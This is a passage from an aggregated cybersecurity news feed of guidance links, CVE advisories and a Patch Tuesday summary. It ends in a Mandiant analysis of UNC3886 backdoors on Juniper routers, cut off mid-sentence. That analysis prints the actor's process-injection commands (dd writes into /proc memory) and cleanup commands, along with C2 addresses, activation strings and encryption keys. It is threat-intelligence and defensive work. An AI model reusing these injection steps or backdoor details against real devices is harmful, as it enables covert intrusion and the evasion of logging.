2025-03-12T09:50:35Z | 1741773035

Guidance for members of the public, website administrators and JavaScript developers in relation to the recently publicised cryptocurrency mining compromises of several websites

https://www.ncsc.gov.uk/guidance/ncsc-advice-malicious-software-used-illegally-mine-cryptocurrency
NCSC advice for Dixons Carphone plc customers
2025-03-12T09:49:28Z | 1741772968

Advice for Dixons Carphone customers following its data breach.

https://www.ncsc.gov.uk/guidance/ncsc-advice-dixons-carphone-plc-customers
NCSC advice on the use of equipment from high risk vendors in UK telecoms networks
2025-03-12T09:48:55Z | 1741772935

The NCSC's guidance for the risk management of high risk vendors in telecommunications networks.

https://www.ncsc.gov.uk/guidance/ncsc-advice-on-the-use-of-equipment-from-high-risk-vendors-in-uk-telecoms-networks
Moving your business from the physical to the digital
2025-03-12T09:47:11Z | 1741772831

Security questions to ask your IT service providers when considering a digital transition

https://www.ncsc.gov.uk/guidance/moving-business-from-physical-to-digital
Mitigating malware and ransomware attacks
2025-03-12T09:46:44Z | 1741772804

How to defend organisations against malware or ransomware attacks

https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks
MIKEY-SAKKE frequently asked questions
2025-03-12T09:46:25Z | 1741772785

A brief guide to MIKEY-SAKKE, a protocol that allows organisations to provide secure communications with end-to-end encryption.

https://www.ncsc.gov.uk/guidance/mikey-sakke-frequently-asked-questions
Mapping your supply chain
2025-03-12T09:45:58Z | 1741772758

How organisations can map their supply chain dependencies, so that risks in the supply chain can be better understood and managed.

https://www.ncsc.gov.uk/guidance/mapping-your-supply-chain
Managing the risk of cloud-enabled products
2025-03-12T09:45:33Z | 1741772733

Guidance outlining the risks of locally installed products interacting with cloud services, and suggestions to help organisations manage this risk.

https://www.ncsc.gov.uk/guidance/managing-risk-cloud-enabled-products
Managing Public Domain Names
2025-03-12T09:44:55Z | 1741772695

Good practises for the management of public domain names owned by your organisation.

https://www.ncsc.gov.uk/guidance/managing-public-domain-names
Maintaining a sustainable strengthened cyber security posture
2025-03-12T09:44:28Z | 1741772668

How organisations can avoid staff burnout during an extended period of heightened cyber threat.

https://www.ncsc.gov.uk/guidance/maintaining-a-sustainable-strengthened-cyber-security-posture
Macro Security for Microsoft Office
2025-03-12T09:44:09Z | 1741772649

Why macros are a threat, and the approaches you can take to protect your systems.

https://www.ncsc.gov.uk/guidance/macro-security-for-microsoft-office
'Krack' Wi-Fi guidance
2025-03-12T09:43:27Z | 1741772607

Guidance for enterprise administrators, small businesses and home users in relation to the recently published 'Krack' vulnerability in Wi-Fi networks protected by WPA2.

https://www.ncsc.gov.uk/guidance/krack
Introduction to identity and access management
2025-03-12T09:42:38Z | 1741772558

This guidance provides a primer on the essential techniques, technologies and uses of access management.

https://www.ncsc.gov.uk/guidance/introduction-identity-and-access-management
How to spot scammers claiming to be from the NCSC
2025-03-12T09:42:04Z | 1741772524

Check that you're talking to a genuine NCSC employee, and not a criminal.

https://www.ncsc.gov.uk/guidance/how-to-spot-scammers-claiming-to-be-from-the-ncsc
How to recover an infected device
2025-03-12T09:41:35Z | 1741772495

Advice for those concerned a device has been infected.

https://www.ncsc.gov.uk/guidance/hacked-device-action-to-take
Home working: preparing your organisation and staff
2025-03-12T09:41:13Z | 1741772473

How to make sure your organisation is prepared for home working.

https://www.ncsc.gov.uk/guidance/home-working
Guidance on digital forensics and protective monitoring specifications for producers of network devices and appliances
2025-03-12T09:40:52Z | 1741772452

Outlining the expectations for the minimum requirement for forensic visibility, to help network defenders secure organisational networks both before and after a compromise.

https://www.ncsc.gov.uk/guidance/guidance-on-digital-forensics-protective-monitoring
Guidance for organisations considering payment in ransomware incidents
2025-03-12T09:40:27Z | 1741772427

Advice for organisations experiencing a ransomware attack and the partner organisations supporting them.

https://www.ncsc.gov.uk/guidance/organisations-considering-payment-in-ransomware-incidents
Guidance for brands to help advertising partners counter malvertising
2025-03-12T09:39:27Z | 1741772367

Advice to make it harder for cyber criminals to deliver malicious advertising, and reduce the risk of cyber-facilitated fraud.

https://www.ncsc.gov.uk/guidance/guidance-brands-advertising-partners-counter-malvertising
Guidance following recent DoS attacks in the run up to the 2019 General Election
2025-03-12T09:37:07Z | 1741772227

Following attacks on political party websites, this guidance provides a summary of 5 practical steps that your organisation can take to help it prepare to respond in the event of a Denial of Service (DoS) attack.

https://www.ncsc.gov.uk/guidance/guidance-following-recent-dos-attacks-2019-general-election
GDPR security outcomes
2025-03-12T09:36:38Z | 1741772198

This guidance describes a set of technical security outcomes that are considered to represent appropriate measures under the GDPR.

https://www.ncsc.gov.uk/guidance/gdpr-security-outcomes
Effective steps to cyber exercise creation
2025-03-12T09:34:50Z | 1741772090

The following tips can help organisations create their own cyber incident response exercises.

https://www.ncsc.gov.uk/guidance/effective-steps-to-cyber-exercise-creation
Guidance on effective communications in a cyber incident
2025-03-12T09:34:01Z | 1741772041

Supporting organisations of all sizes to manage their communications strategy before, during and after a cyber security incident.

https://www.ncsc.gov.uk/guidance/effective-communications-in-a-cyber-incident
Early Years practitioners: using cyber security to protect your settings
2025-03-12T09:33:31Z | 1741772011

How to protect sensitive information about your setting and the children in your care from accidental damage and online criminals.

https://www.ncsc.gov.uk/guidance/early-years-practitioners-using-cyber-security-to-protect-your-settings
Design Pattern: Safely Exporting Data
2025-03-12T09:33:06Z | 1741771986

How to implement a secure end-to-end data export solution

https://www.ncsc.gov.uk/guidance/design-pattern-safely-exporting-data
Design guidelines for high assurance products
2025-03-12T09:32:29Z | 1741771949

Approaches to the design, development and assessment of products capable of resisting elevated threats.

https://www.ncsc.gov.uk/guidance/design-guidelines-for-high-assurance-products
Dealing with the SolarWinds Orion compromise
2025-03-12T09:31:55Z | 1741771915

Immediate actions for all organisations using the SolarWinds Orion suite of IT management tools

https://www.ncsc.gov.uk/guidance/dealing-with-the-solarwinds-orion-compromise
Cyber security for high profile conferences
2025-03-12T09:30:33Z | 1741771833

Managing the cyber security of high profile events in the real and virtual worlds.

https://www.ncsc.gov.uk/guidance/cyber-security-for-high-profile-conferences
Cyber security for farmers
2025-03-12T09:29:37Z | 1741771777

Guidance to help farmers improve the security and resilience of their business against cyber threats.

https://www.ncsc.gov.uk/guidance/cyber-security-for-farmers
Cyber security for construction businesses
2025-03-12T09:29:15Z | 1741771755

Guidance to help the construction industry improve the security and resilience of their business against cyber threats.

https://www.ncsc.gov.uk/guidance/cyber-security-for-construction-businesses
Cyber insurance guidance
2025-03-12T09:28:53Z | 1741771733

Cyber security considerations for organisations thinking about taking out cyber insurance.

https://www.ncsc.gov.uk/guidance/cyber-insurance-guidance
Configuring Microsoft Outlook 365's 'Report Phishing' add-in
2025-03-12T09:28:22Z | 1741771702

How to report emails to the NCSC's Suspicious Email Reporting Service (SERS) using the 'Report Phishing' add-in for Microsoft Outlook 365.

https://www.ncsc.gov.uk/guidance/configuring-o365-outlook-report-phishing-for-sers
Buying and selling second-hand devices
2025-03-12T09:27:03Z | 1741771623

How to erase the personal data from your phone, tablets, and other devices (and why it's important when you're buying and selling them).

https://www.ncsc.gov.uk/guidance/buying-selling-second-hand-devices
Business email compromise: defending your organisation
2025-03-12T09:26:43Z | 1741771603

How to disrupt email phishing attacks that target senior executives or budget holders.

https://www.ncsc.gov.uk/guidance/business-email-compromise-defending-your-organisation
Business communications - SMS and telephone best practice
2025-03-12T09:26:08Z | 1741771568

How to ensure your organisation's SMS and telephone messages are effective and trustworthy.

https://www.ncsc.gov.uk/guidance/business-communications-sms-and-telephone-best-practice
Building and operating a secure online service
2025-03-12T09:25:44Z | 1741771544

Guidance for organisations that use, own, or operate an online service who are looking to start securing it.

https://www.ncsc.gov.uk/guidance/building-operating-secure-online-service
Engaging with Boards to improve the management of cyber security risk
2025-03-12T09:25:17Z | 1741771517

How to communicate more effectively with board members to improve cyber security decision making.

https://www.ncsc.gov.uk/guidance/board-level-cyber-discussions-communicating-clearly
Authentication methods: choosing the right type
2025-03-12T09:24:48Z | 1741771488

Recommended authentication models for organisations looking to move 'beyond passwords'.

https://www.ncsc.gov.uk/guidance/authentication-methods-choosing-the-right-type
Asset management
2025-03-12T09:23:12Z | 1741771392

Implementing asset management for good cyber security.

https://www.ncsc.gov.uk/guidance/asset-management
Approaching enterprise technology with cyber security in mind
2025-03-12T09:19:30Z | 1741771170

How organisations can approach enterprise technology in order to deter cyber attacks.

https://www.ncsc.gov.uk/guidance/approaching-enterprise-technology-cyber-security-mind
AI and cyber security: what you need to know
2025-03-12T09:18:42Z | 1741771122

Understanding the risks - and benefits - of using AI tools.

https://www.ncsc.gov.uk/guidance/ai-and-cyber-security-what-you-need-to-know
Advice for End Users
2025-03-12T09:18:11Z | 1741771091

We recommend that guidance is given to all remote and mobile users on how to keep information on their devices safe and secure.

https://www.ncsc.gov.uk/guidance/end-user-devices-advice-end-users
Actions to take when the cyber threat is heightened
2025-03-12T09:15:20Z | 1741770920

When organisations might face a greater threat, and the steps to take to improve security.

https://www.ncsc.gov.uk/guidance/actions-to-take-when-the-cyber-threat-is-heightened
Acquiring, managing, and disposing of network devices
2025-03-12T09:14:33Z | 1741770873

Advice for organisations on the acquisition, management and disposal of network devices.

https://www.ncsc.gov.uk/guidance/acquiring-managing-and-disposing-network-devices
'Smart' security cameras: Using them safely in your home
2025-03-12T09:13:58Z | 1741770838

How to protect 'smart' security cameras and baby monitors from cyber attack.

https://www.ncsc.gov.uk/guidance/smart-security-cameras-using-them-safely-in-your-home
Expanding Enterprise Security with the Cato LAN NGFW
2025-03-12T08:25:00Z | 1741767900

With enterprise-wide cloud adoption and the onset of hybrid work, the mission has become clear: to securely connect users to applications — no matter where they are.  While solutions like Firewall-as-a-Service (FWaaS), Secure Web Gateway (SWG), and Cloud Access Security Broker (CASB) can protect WAN and internet-bound traffic, anything happening on the internal LAN is... The post Expanding Enterprise Security with the Cato LAN NGFW  appeared first on Cato Networks.

https://www.catonetworks.com/blog/expanding-enterprise-security-with-the-cato-lan-ngfw/
Chromium: CVE-2025-24201 Out of bounds write in GPU on Mac
2025-03-12T07:00:00Z | 1741762800

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024) for more information. Google is aware of reports that an exploit for CVE-2025-24201 exists in the wild.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24201
ZDI-25-129: PDF-XChange Editor RTF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-12T05:00:00Z | 1741755600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2231.

http://www.zerodayinitiative.com/advisories/ZDI-25-129/
High Threat Security Alert (A25-03-11): Vulnerability in Apple Products
2025-03-12T04:00:00Z | 1741752000

Apple has released iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, Safari 18.3.1 and visionOS 2.3.2 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A25-03-12): Multiple Vulnerabilities in Microsoft Products (March 2025)
2025-03-12T04:00:00Z | 1741752000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-13): Multiple Vulnerabilities in Adobe Reader/Acrobat
2025-03-12T04:00:00Z | 1741752000

Patches are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-14): Multiple Vulnerabilities in Fortinet FortiWeb
2025-03-12T04:00:00Z | 1741752000

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert: Microsoft Releases March 2025 Security Updates
2025-03-12T02:19:00Z | 1741745940

Security Alert: Microsoft Releases March 2025 Security Updates

https://www.jpcert.or.jp/english/at/2025/at250005.html
Security Alert: Alert Regarding Vulnerabilities in Adobe Acrobat and Reader (APSB25-14)
2025-03-12T02:19:00Z | 1741745940

Security Alert: Alert Regarding Vulnerabilities in Adobe Acrobat and Reader (APSB25-14)

https://www.jpcert.or.jp/english/at/2025/at250006.html
Adobe Acrobat Reader Font numGlyphs Out-Of-Bounds Read Vulnerability
2025-03-12T00:00:00Z | 1741737600

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2136
Adobe Acrobat Reader Font hMetric Out-Of-Bounds Read Vulnerability
2025-03-12T00:00:00Z | 1741737600

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2134
Adobe Acrobat Reader Font VariationStore itemVariationDataCount Uninitialized Pointer Vulnerability
2025-03-12T00:00:00Z | 1741737600

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2135
Beyond Compliance: How Volt Typhoon Is Rewriting the Rulebook for Utility Cybersecurity
2025-03-11T22:44:29Z | 1741733069

When major U.S. utilities began discovering unauthorized access in their operational systems in early 2023, initial investigations suggested routine compliance issues. The reality, however, was far more concerning: a sophisticated state-sponsored campaign that had been silently mapping critical infrastructure for years, costing millions in forensic and remediation efforts.

https://www.zentera.net/blog/volt-typhoon-utility-cybersecurity
March 2025 Patch Tuesday
2025-03-11T21:27:51Z | 1741728471

Here in the Midwest US, we have a saying about March, “In like a lion, out like a lamb.” This is in reference to the month starting with strong winter weather and letting off as the month progresses. In fact, we just had a blizzard that dropped 9-12 inches of snow across most of the region overnight, but a week later I see grass and sunny skies and have shed the winter coat! At first glance, March Patch Tuesday looks like a lamb, but this lamb might have the teeth of a lion. The standard lineup of updates resolves 57 CVEs across the Windows OS, Office, .Net and Visual Studio, with a couple of Azure component updates in the mix. Google Chrome updated in the lead up to Patch Tuesday (March 10 update), and Adobe released seven updates, including Adobe Acrobat and Acrobat Reader. Now let’s talk teeth. There are seven known exploited CVEs for the March lineup. Microsoft resolved six known exploited CVEs. The zero-day exploits affect the Microsoft Management Console, NTFS, Fast FAT, and the Win32 Kernel Subsystem. All six exploits are rated Important with CVSS scores ranging from 4.6 to 7.8. The good news is all six are resolved by the March Windows OS update, so the majority of the immediate risk is resolved by that one update. Google resolved one known exploited CVE (CVE-2025-24201), which according to the release notes from Google is an out of bounds write-in GPU on Mac reported by the Apple Security Engineering and Architecture (SEAR) team – so likely only a concern for Mac users. (Based on Microsoft’s release notes, it looks like Edge has not resolved the five CVEs in the March 10 release.) Microsoft exploited vulnerabilities Microsoft has resolved a Security Feature Bypass in Microsoft Management Console (CVE-2025-26633). The vulnerability is rated Important and has a CVSSv3.1 score of 7.0. The vulnerability affects all Windows editions from Windows 10 to 11 and Server 2008 to Server 2025. Microsoft has confirmed that this CVE is exploited in the wild. An attacker would need to take additional actions to prepare the target environment for exploitation, but the vulnerability allows for a variety of user-targeted tactics to exploit, including instant message, email and web-based attacks scenarios. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft has resolved a Remote Code Execution vulnerability in Windows NTFS (CVE-2025-24993). The vulnerability is rated Important and has a CVSSv3.1 score of 7.8. The vulnerability affects all Windows editions from Windows 10 to 11 and Server 2008 to Server 2025. Microsoft has confirmed that this CVE is exploited in the wild. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft has resolved an Information Disclosure vulnerability in Windows NTFS (CVE-2025-24991). The vulnerability is rated Important and has a CVSSv3.1 score of 5.5. The vulnerability affects all Windows editions from Windows 10 to 11 and Server 2008 to Server 2025. Microsoft has confirmed that this CVE is exploited in the wild. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft has resolved a Remote Code Execution vulnerability in Windows Fast FAT File System Driver (CVE-2025-24985). The vulnerability is rated Important and has a CVSSv3.1 score of 7.8. The vulnerability affects all Windows editions from Windows 10 to 11 and Server 2008 to Server 2025. Microsoft has confirmed that this CVE is exploited in the wild. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft has resolved an Information Disclosure in Windows NTFS (CVE-2025-24984). The vulnerability is rated Important and has a CVSSv3.1 score of 4.6. The vulnerability affects all Windows editions from Windows 10 to 11 and Server 2008 to Server 2025. Microsoft has confirmed that this CVE is exploited in the wild. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft has resolved an Elevation of Privilege vulnerability in Windows Win32 Kernel Subsystem (CVE-2025-24983). The vulnerability is rated Important and has a CVSSv3.1 score of 7.0. The vulnerability affects older Windows editions including Windows 10 and Server 2008 to Server 2016. Microsoft has confirmed that this CVE is exploited in the wild. If exploited, the attacker could gain SYSTEM-level privileges. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft’s publicly disclosed vulnerabilities Microsoft has resolved a Remote Code Execution vulnerability in Microsoft Access (CVE-2025-26630). The vulnerability is rated Important and has a CVSSv3.1 score of 7.8. The vulnerability affects Microsoft Access 2016, Office 2019, Office LTSC 2021 and 2024, and Microsoft 365 Apps for Enterprise. Microsoft has confirmed that this CVE has been publicly disclosed, but the code maturity is set to be unproven. The disclosure could provide attackers with some additional information to formulate an exploit, but the lack of code samples will increase their efforts. Risk-based prioritization would indicate a slightly higher risk for a disclosure without functional code, but not enough to bump this CVE up to Critical. Third-party vulnerabilities  Google Chrome released updates on March 10 resolving five CVEs, including one known exploited CVE (CVE-2025-24201). The exploit is documented as an out of bounds write-in GPU on Mac. The priority is higher for macOS than Windows for this update. Adobe released seven updates resolving 37 CVEs. The updates affect Adobe Acrobat and Reader, Illustrator, InDesign, Substance 3D Sampler, Painter, Modeler and Designer. All seven updates are rated priority three and can be handled in the course of your monthly update activities. Ivanti security advisory Ivanti has released two updates for the March Patch Tuesday resolving a total of two CVEs. The affected products are Ivanti Secure Access Client (ISAC) and Ivanti Neurons for MDM (N-MDM). For more details you can view the updates and information provided in the March Security Update on the Ivanti blog. March update priorities The Windows OS update is the top priority update this month resolving six known exploited CVEs. The March 10 Google Chrome update resolves one known exploited vulnerability on macOS, making the macOS Chrome update a priority.

https://www.ivanti.com/blog/march-2025-patch-tuesday
Microsoft patchetirsdag mars 2025
2025-03-11T20:16:37Z | 1741724197

Microsoft har offentliggjort sine månedlige sikkerhetsoppdateringer i kveld1. Det er 6 sårbarheter vurdert som kritiske av Microsoft. Disse sårbarhetene er beskrevet i  detalj på Microsoft sine sider1.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/microsoft-patchetirsdag-mars-2025
Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers
2025-03-11T20:00:00Z | 1741723200

Written by: Lukasz Lamparski, Punsaen Boonyakarn, Shawn Chew, Frank Tse, Jakub Jozwiak, Mathew Potaczek, Logeswaran Nadarajan, Nick Harbour, Mustafa Nasser Introduction In mid 2024, Mandiant discovered threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers. Mandiant attributed these backdoors to the China-nexus espionage group, UNC3886. Mandiant uncovered several TINYSHELL-based backdoors operating on Juniper Networks’ Junos OS routers. The backdoors had varying custom capabilities, including active and passive backdoor functions, as well as an embedded script that disables logging mechanisms on the target device. Mandiant worked with Juniper Networks to investigate this activity and observed that the affected Juniper MX routers were running end-of-life hardware and software. Mandiant recommends that organizations upgrade their Juniper devices to the latest images released by Juniper Networks, which includes mitigations and updated signatures for the Juniper Malware Removal Tool (JMRT). Organizations should run the JMRT Quick Scan and Integrity Check after the upgrade. Juniper also released an advisory about this incident. Mandiant has reported on similar custom malware ecosystems in 2022 and 2023 that UNC3886 deployed on virtualization technologies and network edge devices. This blog post showcases a development in UNC3886’s tactics, techniques and procedures (TTPs), and their focus on malware and capabilities that enable them to operate on network and edge devices, which typically lack security monitoring and detection solutions, such as endpoint detection and response (EDR) agents.  Mandiant previously reported on UNC3886's emphasis on techniques to gather and use legitimate credentials to move laterally within a network, undetected. These objectives remained consistent but were pursued with the introduction of a new tool in 2024. Observations in this blog post strengthen our assessment that the actor’s focus is on maintaining long-term access to victim networks. UNC3886 continues to show a deep understanding of the underlying technology of the appliances being targeted. At the time of writing, Mandiant has not identified any technical overlaps between activities detailed in this blog post and those publicly reported by other parties as Volt Typhoon or Salt Typhoon.  Register for our upcoming webinar for a deeper dive into the activity described in this blog post. Attribution UNC3886 is a highly adept China-nexus cyber espionage group that has historically targeted network devices and virtualization technologies with zero-day exploits. UNC3886 interests seem to be focused mainly on defense, technology, and telecommunication organizations located in the US and Asia. The activity described in this blog post is the latest in a number of operations where UNC3886 has leveraged custom malware to target network devices. The malware deployed on Juniper Networks’ Junos OS routers demonstrates that UNC3886 has in-depth knowledge of advanced system internals. Furthermore, UNC3886 continues to prioritize stealth in its operations through the use of passive backdoors, together with log and forensics artifact tampering, indicating a focus on long-term persistence, while minimizing the risk of detection. Junos OS Juniper Networks Junos OS is a proprietary operating system that powers most Juniper routing, switching, and security devices. It is based on a modified FreeBSD operating system. Junos OS supports 2 different modes of operations: CLI mode: where standard Junos OS CLI commands can be issued Shell mode: a user with shell access privileges can access an underlying FreeBSD shell and issue standard FreeBSD commands. Malware identified in this blog post primarily relies on access to the csh shell, but in some cases it is also aware of higher layers. Veriexec Junos OS incorporates a Verified Exec (veriexec) subsystem, which is a modified version of an original NetBSD Veriexec Subsystem. Veriexec is a kernel-based file integrity subsystem that protects the Junos OS operating system (OS) against unauthorized code including binaries, libraries, and scripts and activity that might compromise the integrity of the device. To run malware, the threat actor first needed to bypass veriexec protection. Mandiant did not observe evidence indicating successful exploitation of veriexec bypass techniques already addressed by Juniper in supported software and hardware. However, aside from the process injection technique described later in this blog post, infection on the compromised EOL Juniper MX routers indicate that the threat actor successfully deployed executable backdoors. Mandiant identified the threat actor had root access to the impacted devices. Circumventing Veriexec with Process Injection Veriexec protection prevents unauthorized binaries from executing. This poses a challenge for threat actors, as disabling veriexec can trigger alerts. However, execution of untrusted code is still possible if it occurs within the context of a trusted process. Mandiant’s investigation revealed that UNC3886 was able to circumvent this protection by injecting malicious code into the memory of a legitimate process. This specific technique is now tracked as CVE-2025-21590, as detailed in Juniper Network’s security bulletin JSA93446. To achieve this, UNC3886 first gained privileged access to a Juniper router from a terminal server used for managing network devices using legitimate credentials, and entered the FreeBSD shell from the Junos OS CLI. Within the shell environment, they used the “here document” feature to generate a Base64-encoded file named ldb.b64. This encoded file was then decoded using base64 to create a compressed archive named ldb.tar.gz, which was subsequently decompressed and extracted using the gunzip and tar utilities to extract malicious binaries. Mandiant was unable to recover the full content of ldb.b64 or ldb.tar.gz on the compromised Juniper routers' file system. However, Mandiant successfully recovered three malicious payloads by performing analysis on the memory of a compromised router. The purpose of the payloads was as follows: loader.bin is a shellcode loader responsible for loading functions including exit, mmap, open, read, and close from a standard library libc.so.7, allocating memory, and loading and executing the final payload from payload.bin pc.bin contains a memory address 0x4012f0 payload.bin was identified to be the Position Independent Code (PIC) version of the lmpad backdoor Details of lmpad backdoor are covered in the Malware Analysis section. Mandiant observed the threat actor inject malicious payloads into a newly spawned cat process. The actor created a named pipe called null using mkfifo and used cat to continuously read from it, effectively creating a hung process. This stage involved the following commands: rm -rf null; mkfifo null; cat null & set pid=$! echo " $pid" While the hung cat process was waiting for data from the null pipe, the threat actor leveraged dd to read binary data from the payload files and write it to specific memory locations inside the cat process. dd if=loader.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x4012f0 dd if=pc.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x602820 The first dd command wrote the loader code from loader.bin at the virtual address 0x4012f0, which is the entrypoint of cat. The second dd command replaced data at 0x602820 with the content of pc.bin. Mandiant noted that 0x602820 is the global offset table entry for fclose, this memory location was overwritten with 0x4012f0, indicating that pc.bin contains the memory address where loader.bin was injected to. The threat actor sent an empty string using echo to the null pipe. cat received an end-of-file signal after echo finished writing the data and attempted to close the file by executing fclose. As the global offset table entry for fclose function was replaced with the entrypoint to the shellcode loader, cat executed the shellcode loader instead of the actual fclose function, and ultimately loaded the final payload from payload.bin in the same directory. After payload.bin has been loaded, the threat actor removed the null file and the ldb directory, then terminated the current session. This left only the legitimate process running on the compromised router, now containing the malicious code. The following commands were used to achieve these actions: sleep 1;echo -n>null;sleep 1;rm -rf null cd .. rm -rf ldb kill -9 $$ Mandiant’s investigation noted that this process injection is intended for executing the PIC version of the lmpad backdoor while veriexec is enabled and does not support execution of other backdoors identified on the file system of the compromised Juniper routers.  Malware Overview Mandiant’s investigation identified six distinct malware samples across multiple Juniper MX routers. Each sample is a modified version of a TINYSHELL backdoor, but with unique capabilities. All of these samples incorporate a core TINYSHELL backdoor functionality, but differ greatly when it comes to activation methods as well as additional, Junos OS specific features. The following malware samples were identified: appid - TINYSHELL-based active backdoor, mimicking a legitimate binary named appidd (Application Identification Daemon) to - TINYSHELL-based active backdoor, mimicking a legitimate binary named top (Table of Processes) irad - TINYSHELL-based passive backdoor, mimicking a legitimate binary named irsd (Interface Replication and Synchronization Daemon) lmpad - TINYSHELL-based utility and passive backdoor, mimicking a legitimate binary named lmpd (Link Management Protocol Daemon) jdosd - TINYSHELL-based passive backdoor, mimicking a legitimate binary named jddosd (Juniper DDOS protection Daemon) oemd - TINYSHELL-based passive backdoor, mimicking a legitimate binary named oamd (Operation, Administration and Maintenance Daemon) TINYSHELL TINYSHELL is a publicly available lightweight backdoor written in C that communicates using a custom binary protocol. The standard set of TINYSHELL commands comprises of: Remote file upload Remote file download Establishing remote shell session A basic TINYSHELL implementation for FreeBSD seems to be a foundation for heavily customized backdoors detailed as follows. Malware Analysis appid — TINYSHELL-Based Active Backdoor Sample one, named appid, is an active backdoor written in C. It is derived from the publicly available TINYSHELL source code with additional supported commands. It is an active backdoor that communicates to the following hardcoded command and control (C2) servers: TCP://129[.]126[.]109[.]50:22 TCP://116[.]88[.]34[.]184:22 TCP://223[.]25[.]78[.]136:22 TCP://45[.]77[.]39[.]28:22 Mandiant believes these IPs are staging nodes of a GOBRAT ORB network, eventually leading to a single, backend Adversary Controlled Operations Server (“ACOS”). This malware begins by communicating to a random C2 server from the list. The malware maintains two TCP sockets that will stay synchronized with the same C2 address. One socket is used for tasking requests and the other is for handling requests. The malware will rotate through the list of C2 servers until a successful connection is created and it will request a task using the first socket. After receiving a task from the C2, the malware then creates a second socket for handling this specific task. After the task is finished, the second socket is closed. The malware encrypts all network traffic with AES using a hard-coded key. The following commands are supported by malware, consisting of standard TINYSHELL commands and added proxy and reconfiguration capabilities: Number Name Description Comment 1 tshd_get_file Sends a file to the server Standard TINYSHELL command 2 tshd_put_file Downloads a file from the server Standard TINYSHELL command 3 tshd_runshell Launches an interactive /bin/sh shell session Standard TINYSHELL command 4 tshd_setproxy Establish a Socks proxy to a given IP+port number Custom command 5 tshd_config Change Configuration Menu Custom command The following is the list of configuration items that can be changed by the command number 5 (tshd_config) and their associated config menu numbers: Number Config Item 11 C2 IP Address 1 12 C2 IP Address 2 13 C2 IP Address 3 14 C2 IP Address 4 2 C2 Port Number 3 C2 Network Interface 4 Sleep Timeout 0 Exit Config Menu to — TINYSHELL-Based Active Backdoor  Sample two, named to, is the same as Sample 1 but with different hardcoded C2 servers: tcp://101[.]100[.]182[.]122:22 tcp://118[.]189[.]188[.]122:22 tcp://158[.]140[.]135[.]244:22 tcp://8[.]222[.]225[.]8:22 irad — TINYSHELL-Based Passive Backdoor Sample three, named irad, is a TINYSHELL-based passive backdoor written in C. It acts as a libpcap-based packet sniffer and receives commands by inspecting packets on the wire looking for a magic-string that activates its backdoor capabilities. Malware supports 2 modes of operation: active mode, in which it will connect to a provided C2 address, or a passive - listening mode.  In addition to 3 standard TINYSHELL commands, it implements 2 custom commands and a custom activation routine. The malware uses libpcap library to capture all network packets on the host (interface specified in the eth environment variable) matching the BPF filter of icmp[4:2] == 0xaa56. It reads 16 bytes of data starting at offset 10 from the ICMP packet. The malware has insufficient bounds checking and could read past the end of a packet payload if a smaller than expected packet is encountered. For any ICMP type code 8 (Echo request) packets, it reads the 16 bytes of data and decrypts it with a single byte XOR key 0x86. It then compares the decrypted data with a magic string uSarguuS62bKRA0J. If the string matches and the byte 8 of the ICMP packet matches ascii character 1 or 2, it then reads the target IP and TCP port number from the ICMP packet and establishes a TCP connection to the specified IP (active mode). It uses a custom AES and HMAC implementation to encrypt and authenticate the communication. It uses a hardcoded key string WZtOTig2m42gXB6U to derive session keys and a hardcoded authentication token 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D to authenticate a target. After authenticating a connection to a target host it starts encrypted communication. If the response from the target host begins with the string ek63a21km7WSWkfk then it exits, otherwise it decodes the command number from the packet: Command Number Function Comment 1 Upload a file to the remote host Standard TINYSHELL command 2 Download a file from the remote host Standard TINYSHELL command 3 Launch an interactive /bin/csh session Standard TINYSHELL command 4 Does nothing Custom command 5 Relay the current connection to a specified IP and Port Custom command If byte 8 of the ICMP packet is 0, the malware will spawn a listening server on TCP port 31234 (passive mode). The listening backdoor server supports the same set of 5 commands as listed in the previous table, and the same encryption and authentication protocol. If the string 1spCq0BMbJwCoeZn is received, and the malware is currently operating as a listener and accepting connections on port 31234, then it will terminate the listening process. lmpad — TINYSHELL-Based Utility and Passive Backdoor Sample four, named lmpad is an utility and a passive backdoor written in C. In addition to standard TINYSHELL capabilities it can also launch an external script that can perform process injection into two legitimate Junos OS processes to inhibit logging. The main purpose of this malware is to disable all possible logging before the operator connects to the router to perform hands-on activities and then later restore the logs after the operator disconnects.  The malware begins by attempting to receive a UDP packet on port 33615, where it receives an RC4 encrypted message and sends an acknowledgement message in response. The malware also checks the decrypted received payload against the following hex bytes, terminating the connection if it doesn't match. 26 e7 2b 3a 1c a2 16 2d 61 89 57 a9 cd 4c e7 3c The RC4 encryption key used to decrypt received UDP messages is: 0b3330c0b41d1ae2. After the initial check, the malware enters a listening mode, waiting for commands. In addition to standard TINYSHELL commands (command 2, 4 and 5) it also implements 5 other custom commands: Command 0 This command inhibits logging in preparation of 